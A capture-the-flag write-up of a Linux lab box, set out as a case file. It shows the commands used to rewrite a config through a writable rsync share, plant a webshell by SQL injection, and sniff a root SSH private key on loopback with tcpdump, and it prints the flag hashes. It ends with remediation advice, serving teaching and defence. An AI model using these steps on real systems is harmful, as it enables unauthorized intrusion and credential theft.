Case file

Writable rsync Conf, admin SQLi RCE, and loopback SSH key sniff

Intermediate Linux engagement: anonymous rsync module Conf allowed rewriting webapp.ini prod to dev; Union SQLi on /admin yielded OS shell as tom; tcpdump on lo captured a root SSH private key from an internal service.

Intermediate24 minRsync · SQL Injection · Traffic Capture · Privilege Escalation
01

Engagement summary

rsync Conf writable; env=dev unlocked admin; UNION SQLi to webshell; lo sniff recovered root id_rsa.

METAMORPHOSIS (Incognito CTF) exposed HTTP and rsync (873). Listing rsync://TARGET/Conf showed webapp.ini with env = prod, user = tom, and a password field. Pulling the module, flipping env to dev, and pushing webapp.ini back via rsync unlocked /admin (previously 403). The admin username field accepted Union-based SQLi (three columns; 2/3 string-capable). sqlmap --os-shell / INTO OUTFILE webshell delivered command execution; user artifact 4ce794a9d0019c1f684e07556821e0b0 recovered under tom. Privilege escalation: an internal service periodically emitted material on loopback — tcpdump -i lo -A captured a root SSH private key. chmod 600 and ssh -i key root@TARGET yielded root artifact 7ffca2ec63534d165525bf37d91b4ff4. Chain: writable config share to SQLi RCE to local key exfil over lo.

Business impact

Anonymous writable rsync modules are remote config control planes. Dev-mode admin panels with SQLi become RCE. Services that print secrets to localhost still lose them to any local foothold with CAP_NET_RAW / tcpdump — encrypt or use Unix sockets with strict creds.

02

Rsync config flip and SQLi foothold

Pulled/pushed Conf; UNION SQLi to webshell; read user.txt.

OPERATOR · RSYNC / SQLI

savvy@lab:~$ rsync rsync://10.10.10.10/Conf/

webapp.ini (env = prod)

savvy@lab:~$ # set env = dev; rsync -av webapp.ini rsync://10.10.10.10/Conf/

savvy@lab:~$ # UNION SELECT INTO OUTFILE /var/www/html/cmd.php

savvy@lab:~$ curl -s 'http://10.10.10.10/cmd.php?cmd=id'

uid=...(tom) user.txt recovered

webapp.ini

webapp.ini

[Web_App]
env = dev
user = tom
password = ********
03

Loopback capture to root SSH

tcpdump on lo recovered root private key; SSH as root.

OPERATOR · SNIFF / SSH

savvy@lab:~$ tcpdump -i lo -A -nn -s0 | tee lo.cap

-----BEGIN OPENSSH PRIVATE KEY----- ...

savvy@lab:~$ chmod 600 root_key && ssh -i root_key root@10.10.10.10

root@lab:~# cat /root/root.txt

7ffca2ec63534d165525bf37d91b4ff4

Remediation

Require auth on rsync modules; make Conf read-only from deploy pipelines. Keep admin panels out of prod or behind SSO. Never transmit private keys in cleartext on lo — use ssh-agent / vault-issued short-lived certs. Restrict tcpdump/CAP_NET_RAW.